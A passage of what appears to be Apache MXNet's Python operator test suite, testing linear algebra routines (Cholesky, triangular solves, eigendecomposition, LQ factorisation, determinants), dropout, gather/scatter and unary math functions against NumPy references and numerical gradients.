[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: test fails intermittently when cudnn on. temporarily disabled cudnn until gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
